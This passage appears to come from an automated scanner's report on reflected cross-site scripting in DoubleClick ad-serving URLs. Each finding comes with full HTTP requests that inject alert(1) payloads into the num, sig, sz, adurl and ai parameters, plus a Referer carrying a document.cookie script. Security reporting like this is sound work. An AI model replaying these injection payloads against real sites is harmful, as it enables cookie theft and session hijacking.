The value of the num request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 74214'-alert(1)-'6b515b85808 was submitted in the num parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N3220.no_url_specifiedOX2959/B5443304.3;sz=300x250;pc=%5BTPAS_ID%5D;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BApc75B3RTeGXDI33lQf9xI3pAZOBzLgCAAAAEAEgADgAWIvH7akmYMmGhYmIpIQQggEXY2EtcHViLTY5Mzk5NzU3ODQ1MDUzMTOyARB3d3cubWV0YWNhZmUuY29tugEJZ2ZwX2ltYWdlyAEJ2gFoaHR0cDovL3d3dy5tZXRhY2FmZS5jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=074214'-alert(1)-'6b515b85808&sig=AGiWqty6ua9ZhZm-yloXPFnjUMe7ffbTzw&client=ca-pub-6939975784505313&adurl=;ord=1372756456? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
Cookie: id=c60bd0733000097|2258832/785797/15105|t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 16 May 2011 12:52:41 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8333

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n\n<!-- Code auto-generated on Tue Apr 12 22:59:51 EDT 2011 -->\n\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=074214'-alert(1)-'6b515b85808&sig=AGiWqty6ua9ZhZm-yloXPFnjUMe7ffbTzw&client=ca-pub-6939975784505313&adurl=http%3a%2f%2fpixel.quantserve.com/r%3Ba%3Dp-96ifrWFBpTdiA%3Blabels%3D_click.adserver.doubleclick%2Ahttp%3A//www.worldofudraw
...[SNIP]...

3.9. http://ad.doubleclick.net/adj/N3220.no_url_specifiedOX2959/B5443304.3 [sig parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N3220.no_url_specifiedOX2959/B5443304.3

Issue detail

The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 168dc"-alert(1)-"4bc3c012150 was submitted in the sig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N3220.no_url_specifiedOX2959/B5443304.3;sz=300x250;pc=%5BTPAS_ID%5D;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BApc75B3RTeGXDI33lQf9xI3pAZOBzLgCAAAAEAEgADgAWIvH7akmYMmGhYmIpIQQggEXY2EtcHViLTY5Mzk5NzU3ODQ1MDUzMTOyARB3d3cubWV0YWNhZmUuY29tugEJZ2ZwX2ltYWdlyAEJ2gFoaHR0cDovL3d3dy5tZXRhY2FmZS5jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=0&sig=AGiWqty6ua9ZhZm-yloXPFnjUMe7ffbTzw168dc"-alert(1)-"4bc3c012150&client=ca-pub-6939975784505313&adurl=;ord=1372756456? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
Cookie: id=c60bd0733000097|2258832/785797/15105|t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 16 May 2011 12:52:46 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8333

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n\n<!-- Code auto-generated on Tue Apr 12 22:59:51 EDT 2011 -->\n\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=0&sig=AGiWqty6ua9ZhZm-yloXPFnjUMe7ffbTzw168dc"-alert(1)-"4bc3c012150&client=ca-pub-6939975784505313&adurl=http%3a%2f%2fpixel.quantserve.com/r%3Ba%3Dp-96ifrWFBpTdiA%3Blabels%3D_click.adserver.doubleclick%2Ahttp%3A//www.worldofudraw.com/");

var fscUrl = url;

var fscUrl
...[SNIP]...

3.10. http://ad.doubleclick.net/adj/N3220.no_url_specifiedOX2959/B5443304.3 [sig parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N3220.no_url_specifiedOX2959/B5443304.3

Issue detail

The value of the sig request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d096f'-alert(1)-'c9bc2352f53 was submitted in the sig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N3220.no_url_specifiedOX2959/B5443304.3;sz=300x250;pc=%5BTPAS_ID%5D;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BApc75B3RTeGXDI33lQf9xI3pAZOBzLgCAAAAEAEgADgAWIvH7akmYMmGhYmIpIQQggEXY2EtcHViLTY5Mzk5NzU3ODQ1MDUzMTOyARB3d3cubWV0YWNhZmUuY29tugEJZ2ZwX2ltYWdlyAEJ2gFoaHR0cDovL3d3dy5tZXRhY2FmZS5jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=0&sig=AGiWqty6ua9ZhZm-yloXPFnjUMe7ffbTzwd096f'-alert(1)-'c9bc2352f53&client=ca-pub-6939975784505313&adurl=;ord=1372756456? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
Cookie: id=c60bd0733000097|2258832/785797/15105|t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 16 May 2011 12:52:50 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8333

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n\n<!-- Code auto-generated on Tue Apr 12 22:59:51 EDT 2011 -->\n\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=0&sig=AGiWqty6ua9ZhZm-yloXPFnjUMe7ffbTzwd096f'-alert(1)-'c9bc2352f53&client=ca-pub-6939975784505313&adurl=http%3a%2f%2fpixel.quantserve.com/r%3Ba%3Dp-96ifrWFBpTdiA%3Blabels%3D_click.adserver.doubleclick%2Ahttp%3A//www.worldofudraw.com/\">
...[SNIP]...

3.11. http://ad.doubleclick.net/adj/N3220.no_url_specifiedOX2959/B5443304.3 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N3220.no_url_specifiedOX2959/B5443304.3

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ad9d5'-alert(1)-'414f1c46651 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N3220.no_url_specifiedOX2959/B5443304.3;sz=300x250;pc=%5BTPAS_ID%5D;click=http://adclick.g.doubleclick.net/aclk?sa=Lad9d5'-alert(1)-'414f1c46651&ai=BApc75B3RTeGXDI33lQf9xI3pAZOBzLgCAAAAEAEgADgAWIvH7akmYMmGhYmIpIQQggEXY2EtcHViLTY5Mzk5NzU3ODQ1MDUzMTOyARB3d3cubWV0YWNhZmUuY29tugEJZ2ZwX2ltYWdlyAEJ2gFoaHR0cDovL3d3dy5tZXRhY2FmZS5jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=0&sig=AGiWqty6ua9ZhZm-yloXPFnjUMe7ffbTzw&client=ca-pub-6939975784505313&adurl=;ord=1372756456? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
Cookie: id=c60bd0733000097|2258832/785797/15105|t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 16 May 2011 12:52:25 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8333

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n\n<!-- Code auto-generated on Tue Apr 12 22:59:51 EDT 2011 -->\n\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
et/click%3Bh%3Dv8/3b09/f/210/%2a/m%3B239990545%3B0-0%3B0%3B62878001%3B4307-300/250%3B41692150/41709937/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://adclick.g.doubleclick.net/aclk?sa=Lad9d5'-alert(1)-'414f1c46651&ai=BApc75B3RTeGXDI33lQf9xI3pAZOBzLgCAAAAEAEgADgAWIvH7akmYMmGhYmIpIQQggEXY2EtcHViLTY5Mzk5NzU3ODQ1MDUzMTOyARB3d3cubWV0YWNhZmUuY29tugEJZ2ZwX2ltYWdlyAEJ2gFoaHR0cDovL3d3dy5tZXRhY2FmZS5jb20vZnBsYXllci8_NDcw
...[SNIP]...

3.12. http://ad.doubleclick.net/adj/N3220.no_url_specifiedOX2959/B5443304.3 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N3220.no_url_specifiedOX2959/B5443304.3

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 25d83"-alert(1)-"24bc777dba0 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N3220.no_url_specifiedOX2959/B5443304.3;sz=300x250;pc=%5BTPAS_ID%5D;click=http://adclick.g.doubleclick.net/aclk?sa=L25d83"-alert(1)-"24bc777dba0&ai=BApc75B3RTeGXDI33lQf9xI3pAZOBzLgCAAAAEAEgADgAWIvH7akmYMmGhYmIpIQQggEXY2EtcHViLTY5Mzk5NzU3ODQ1MDUzMTOyARB3d3cubWV0YWNhZmUuY29tugEJZ2ZwX2ltYWdlyAEJ2gFoaHR0cDovL3d3dy5tZXRhY2FmZS5jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=0&sig=AGiWqty6ua9ZhZm-yloXPFnjUMe7ffbTzw&client=ca-pub-6939975784505313&adurl=;ord=1372756456? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
Cookie: id=c60bd0733000097|2258832/785797/15105|t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 16 May 2011 12:52:21 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8333

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n\n<!-- Code auto-generated on Tue Apr 12 22:59:51 EDT 2011 -->\n\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
et/click%3Bh%3Dv8/3b09/f/210/%2a/m%3B239990545%3B0-0%3B0%3B62878001%3B4307-300/250%3B41692150/41709937/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://adclick.g.doubleclick.net/aclk?sa=L25d83"-alert(1)-"24bc777dba0&ai=BApc75B3RTeGXDI33lQf9xI3pAZOBzLgCAAAAEAEgADgAWIvH7akmYMmGhYmIpIQQggEXY2EtcHViLTY5Mzk5NzU3ODQ1MDUzMTOyARB3d3cubWV0YWNhZmUuY29tugEJZ2ZwX2ltYWdlyAEJ2gFoaHR0cDovL3d3dy5tZXRhY2FmZS5jb20vZnBsYXllci8_NDcw
...[SNIP]...

3.13. http://ad.doubleclick.net/adj/N763.metacafecom/B5470558.8 [adurl parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N763.metacafecom/B5470558.8

Issue detail

The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cb8d6"-alert(1)-"3bdf7305698 was submitted in the adurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N763.metacafecom/B5470558.8;sz=300x250;pc=[TPAS_ID];click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BEqu0Wx3RTdKPFsqElgem0IXUAaPrkrcCAAAAEAEgADgAWLPuvJcmYMmGhYmIpIQQggEXY2EtcHViLTY5Mzk5NzU3ODQ1MDUzMTOyARB3d3cubWV0YWNhZmUuY29tugEJZ2ZwX2ltYWdlyAEJ2gFoaHR0cDovL3d3dy5tZXRhY2FmZS5jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=0&sig=AGiWqtyQFFQIjB0euHoXLYknz4rWBkCqdg&client=ca-pub-6939975784505313&adurl=cb8d6"-alert(1)-"3bdf7305698 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 7545
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 16 May 2011 12:50:46 GMT
Expires: Mon, 16 May 2011 12:50:46 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Apr 28 10:48:35 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
JTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=0&sig=AGiWqtyQFFQIjB0euHoXLYknz4rWBkCqdg&client=ca-pub-6939975784505313&adurl=cb8d6"-alert(1)-"3bdf7305698http://w.espn.go.com/espnw/?ex_cid=2011_bnnr_espw_mcaf_1bxx_pain");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var
...[SNIP]...

3.14. http://ad.doubleclick.net/adj/N763.metacafecom/B5470558.8 [adurl parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N763.metacafecom/B5470558.8

Issue detail

The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload be027'-alert(1)-'aa4739289b5 was submitted in the adurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N763.metacafecom/B5470558.8;sz=300x250;pc=[TPAS_ID];click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BEqu0Wx3RTdKPFsqElgem0IXUAaPrkrcCAAAAEAEgADgAWLPuvJcmYMmGhYmIpIQQggEXY2EtcHViLTY5Mzk5NzU3ODQ1MDUzMTOyARB3d3cubWV0YWNhZmUuY29tugEJZ2ZwX2ltYWdlyAEJ2gFoaHR0cDovL3d3dy5tZXRhY2FmZS5jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=0&sig=AGiWqtyQFFQIjB0euHoXLYknz4rWBkCqdg&client=ca-pub-6939975784505313&adurl=be027'-alert(1)-'aa4739289b5 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 7537
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 16 May 2011 12:50:51 GMT
Expires: Mon, 16 May 2011 12:50:51 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu May 12 17:46:05 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
JTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=0&sig=AGiWqtyQFFQIjB0euHoXLYknz4rWBkCqdg&client=ca-pub-6939975784505313&adurl=be027'-alert(1)-'aa4739289b5http://w.espn.go.com/espnw/?ex_cid=2011_bnnr_espw_mcaf_1axx_nbap \">
...[SNIP]...

3.15. http://ad.doubleclick.net/adj/N763.metacafecom/B5470558.8 [ai parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N763.metacafecom/B5470558.8

Issue detail

The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5b114"-alert(1)-"668a0f0874f was submitted in the ai parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N763.metacafecom/B5470558.8;sz=300x250;pc=[TPAS_ID];click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BEqu0Wx3RTdKPFsqElgem0IXUAaPrkrcCAAAAEAEgADgAWLPuvJcmYMmGhYmIpIQQggEXY2EtcHViLTY5Mzk5NzU3ODQ1MDUzMTOyARB3d3cubWV0YWNhZmUuY29tugEJZ2ZwX2ltYWdlyAEJ2gFoaHR0cDovL3d3dy5tZXRhY2FmZS5jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ5b114"-alert(1)-"668a0f0874f&num=0&sig=AGiWqtyQFFQIjB0euHoXLYknz4rWBkCqdg&client=ca-pub-6939975784505313&adurl=;ord=1792635571? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 16 May 2011 12:50:13 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7548

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue May 03 11:33:15 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
2FmZS5jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ5b114"-alert(1)-"668a0f0874f&num=0&sig=AGiWqtyQFFQIjB0euHoXLYknz4rWBkCqdg&client=ca-pub-6939975784505313&adurl=http://w.espn.go.com/espnw/?ex_cid=2011_bnnr_espw_mcaf_1axx_line ");
var fscUrl = url;
var fscUrlClickTagFound = fal
...[SNIP]...

3.16. http://ad.doubleclick.net/adj/N763.metacafecom/B5470558.8 [ai parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N763.metacafecom/B5470558.8

Issue detail

The value of the ai request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload af04c'-alert(1)-'43db30c6c8d was submitted in the ai parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N763.metacafecom/B5470558.8;sz=300x250;pc=[TPAS_ID];click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BEqu0Wx3RTdKPFsqElgem0IXUAaPrkrcCAAAAEAEgADgAWLPuvJcmYMmGhYmIpIQQggEXY2EtcHViLTY5Mzk5NzU3ODQ1MDUzMTOyARB3d3cubWV0YWNhZmUuY29tugEJZ2ZwX2ltYWdlyAEJ2gFoaHR0cDovL3d3dy5tZXRhY2FmZS5jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQaf04c'-alert(1)-'43db30c6c8d&num=0&sig=AGiWqtyQFFQIjB0euHoXLYknz4rWBkCqdg&client=ca-pub-6939975784505313&adurl=;ord=1792635571? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 16 May 2011 12:50:17 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7543

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu May 12 17:46:05 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
